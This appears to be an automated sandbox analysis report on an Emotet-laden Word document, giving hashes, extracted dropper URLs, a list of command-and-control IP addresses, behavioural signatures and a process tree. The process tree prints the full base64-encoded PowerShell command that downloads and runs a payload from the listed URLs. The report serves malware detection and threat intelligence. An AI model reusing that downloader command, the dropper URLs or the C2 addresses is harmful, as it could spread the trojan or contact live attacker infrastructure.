Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    57s
  • max time network
    66s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 18:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f.doc

  • Size

    196KB

  • MD5

    629b66fbf0b163240f096727d281ebd1

  • SHA1

    549b7d1a7e0a26bd368d1df9d2918d85164db1b4

  • SHA256

    a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f

  • SHA512

    68c19e821143ea009366ee1d9e02abe72fb9f17e58052bdd5eedd432b53f8a10046558ff1bd3a70b31b520598d93f68f4e51fbde506b5bfed64f3601a3dbb06b

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://topgameus.com/AutoIT_UngdungOnline/zqjqel/
exe.dropper

http://cpads.net/7iuhq/mri/
exe.dropper

https://tyres2c.com/wp-admin/zu2h/
exe.dropper

https://thesuperservice.com/wp-admin/rL00/
exe.dropper

https://ssuse.com/wp-content/uploads/IMv2xyEc3/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080
rsa_pubkey.plain

Signatures

  • Blacklisted process makes network request 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1460
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAFQAeQBgAHAAUgBPAHQATwBjAGAAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACAAPQAgACcANgA3ADcAJwA7ACQAYwBoAGEAaQB4AHcAZQBlAHgAPQAnAHgAYQBvAHMAJwA7ACQAYwBoAGEAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACsAJwAuAGUAeABlACcAOwAkAGoAZQBhAG0AYwBoAGEAYgA9ACcAcQB1AGEAZQBmAHkAbwB1AGwAcABvAHUAdwBqAGEAaQBoAHQAdQBhAHIAJwA7ACQAdABoAGEAZQBxAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAEIAQwBMAGkARQBuAFQAOwAkAHQAaQBhAGcAeQBvAHUAcwB2AHUAdQBiAD0AJwBoAHQAdABwADoALwAvAHQAbwBwAGcAYQBtAGUAdQBzAC4AYwBvAG0ALwBBAHUAdABvAEkAVABfAFUAbgBnAGQAdQBuAGcATwBuAGwAaQBuAGUALwB6AHEAagBxAGUAbAAvACoAaAB0AHQAcAA6AC8ALwBjAHAAYQBkAHMALgBuAGUAdAAvADcAaQB1AGgAcQAvAG0AcgBpAC8AKgBoAHQAdABwAHMAOgAvAC8AdAB5AHIAZQBzADIAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AegB1ADIAaAAvACoAaAB0AHQAcABzADoALwAvAHQAaABlAHMAdQBwAGUAcgBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByAEwAMAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBzAHUAcwBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEkATQB2ADIAeAB5AEUAYwAzAC8AJwAuACIAcwBwAGAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABiAG8AdQBtAHkAYQBvAG0AaABvAGkAegBqAGUAaQBuAGYAZQBpAHYAPQAnAGYAaQBvAHQAaABnAG8AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeABlAGUAeABjAGUAYwBoACAAaQBuACAAJAB0AGkAYQBnAHkAbwB1AHMAdgB1AHUAYgApAHsAdAByAHkAewAkAHQAaABhAGUAcQB1AC4AIgBEAGAAbwBXAG4ATABPAGAAQQBkAEYAYABpAGwARQAiACgAJAB4AGUAZQB4AGMAZQBjAGgALAAgACQAYwBoAGEAeQApADsAJABtAGEAZQByAGIAbwBlAHAAYwB1AGEAZwA9ACcAdgBlAGEAYgB0AHUAcAByAHUAdQBsAGMAaABpAGEAegBiAG8AYQBoACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBoAGEAeQApAC4AIgBMAGUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA2ADcANgA0ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIARQBhAGAAVABlACIAKAAkAGMAaABhAHkAKQA7ACQAYwBlAGMAaABjAGEAdQB0AHQAaABlAG8AcQB1AHMAbwBlAG0APQAnAGoAbwBpAGsAagBvAGEAcABkAGkAZQBzACcAOwBiAHIAZQBhAGsAOwAkAGcAYQB1AGcAeQB1AHkAcgB1AHkAeQB1AG4AYgB1AHUAZgBrAGUAcgA9ACcAdABpAGEAdwBmAGUAbwBjAGYAYQBpAHMAagBhAGUAZgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwAGkAeAB3AHUAegB2AG8AYQBtAGwAdQB1AHMAagBvAG8AeQBrAGkAbQA9ACcAcwBpAGMAaABrAGUAaQBnAHYAbwBhAGMAJwA=
    1⤵
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:1760
  • C:\Users\Admin\677.exe
    C:\Users\Admin\677.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:1588
    • C:\Windows\SysWOW64\rdpcore\VAN.exe
      "C:\Windows\SysWOW64\rdpcore\VAN.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1992

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1460-2-0x0000000008820000-0x0000000008824000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1460-3-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1460-4-0x000000000ABA0000-0x000000000ABA4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1460-5-0x000000000BC20000-0x000000000BC24000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1460-6-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1460-7-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1588-10-0x00000000002F0000-0x00000000002FC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1992-13-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB

    Download